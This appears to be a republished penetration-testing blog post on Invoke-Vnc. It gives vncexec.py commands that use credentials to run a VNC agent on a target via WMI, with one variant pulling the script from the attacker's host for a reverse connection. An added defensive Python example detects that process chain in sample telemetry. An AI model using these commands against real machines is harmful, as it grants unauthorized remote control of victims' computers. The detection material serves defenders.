Execute agent remotely via WMI
If you have authenticated access (a password, NT hash or Kerberos ticket) to the target machine, you can use the vncexec.py script to execute the VNC agent remotely.
Upload an encoded .ps1 script as a .bat file via SMB and execute the agent to bind a VNC port on the target:
vncexec.py -invoke-vnc-path Invoke-Vnc.ps1 -contype bind -vncport 5900 -vncpass P@ssw0rd -method upload user:pass@target_ip
Download the script via HTTP from the attacker’s host and execute the agent to get a reverse VNC connection:
vncexec.py -bc-ip -httpport 8080 -invoke-vnc-path Invoke-Vnc.ps1 -contype reverse -vncport 5500 -vncpass P@ssw0rd -method download user:pass@target_ip
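The two invocations above leave a recognisable trace on the target: the WMI provider host spawns a command shell that runs a batch file, and that batch file in turn launches PowerShell with an encoded command. The following added example (not part of the Invoke-Vnc project or this post) shows how a defender can flag that chain in process-creation telemetry. The JSON-lines field names (host, parent, image, cmdline) are an assumed normalised schema, and every event and the encoded payload are constructed for the example.

```python
"""Flag process-creation telemetry matching the WMI -> batch file ->
encoded PowerShell chain described above.  Events are constructed samples
and the field names are an assumed schema, not a vendor format."""
import base64
import binascii
import json
import ntpath

# Constructed stand-in for the encoded script: base64 of a UTF-16LE string,
# which is the encoding PowerShell expects after -EncodedCommand.
ENC = base64.b64encode("Write-Host 'constructed sample'".encode("utf-16-le")).decode()

# Constructed sample events, one JSON object per line (assumed schema that
# roughly mirrors a Sysmon Event ID 1 or Security 4688 record).
SAMPLE_EVENTS = "\n".join([
    json.dumps({"host": "ws01",
                "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
                "image": r"C:\Windows\System32\cmd.exe",
                "cmdline": r"cmd.exe /Q /c C:\Windows\Temp\svc.bat"}),
    json.dumps({"host": "ws01",
                "parent": r"C:\Windows\System32\cmd.exe",
                "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                "cmdline": "powershell.exe -nop -w hidden -enc " + ENC}),
    # Benign control: a user running a batch file from Explorer.
    json.dumps({"host": "ws02",
                "parent": r"C:\Windows\explorer.exe",
                "image": r"C:\Windows\System32\cmd.exe",
                "cmdline": r"cmd.exe /c C:\Users\bob\build.bat"}),
])


def decode_encoded_command(cmdline):
    """Return the decoded script passed via -EncodedCommand (or any of the
    unambiguous prefixes PowerShell accepts, e.g. -enc, -ec), else None."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        flag = tok.lstrip("-/").lower()
        if not flag or not "encodedcommand".startswith(flag):
            continue
        try:
            raw = base64.b64decode(tokens[i + 1], validate=True)
            return raw.decode("utf-16-le")
        except (binascii.Error, UnicodeDecodeError):
            continue  # looked like the flag but the next token is not a payload
    return None


def analyse(jsonl):
    """Scan JSON-lines process events; return (host, reason, detail) findings."""
    findings = []
    for line in jsonl.splitlines():
        ev = json.loads(line)
        parent = ntpath.basename(ev["parent"]).lower()
        image = ntpath.basename(ev["image"]).lower()
        cmd = ev["cmdline"]
        # Remote WMI execution (Win32_Process Create) shows up as WmiPrvSE.exe
        # being the parent of the launched command.  A batch file there is the
        # upload-and-execute pattern from the post.
        if parent == "wmiprvse.exe" and image in ("cmd.exe", "powershell.exe") \
                and ".bat" in cmd.lower():
            findings.append((ev["host"], "wmi-spawned shell running a batch file", cmd))
        # Any encoded PowerShell command is worth surfacing with its decoded text,
        # so an analyst can see the script rather than an opaque blob.
        if image == "powershell.exe":
            decoded = decode_encoded_command(cmd)
            if decoded is not None:
                findings.append((ev["host"], "encoded PowerShell command", decoded))
    return findings


if __name__ == "__main__":
    for host, reason, detail in analyse(SAMPLE_EVENTS):
        print(f"[{host}] {reason}: {detail}")
```

The benign third event is not reported because its parent is Explorer, not the WMI provider host; the two findings on ws01 together describe the chain the post relies on. For the bind and reverse variants, a network-connection data source (a PowerShell process listening on the chosen VNC port, or connecting out to port 5500) would complete the picture, but that is a separate event type and is left out here.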
The script depends on a recent build of the impacket library. Get it at http://ift.tt/1JaAv3K
git clone http://ift.tt/1JaAv3K
sudo python setup.py install
Invoke over net:
Launch VNC listener to catch reverse VNC connection:
The post Invoke-Vnc: Powershell VNC injector appeared first on Penetration Testing.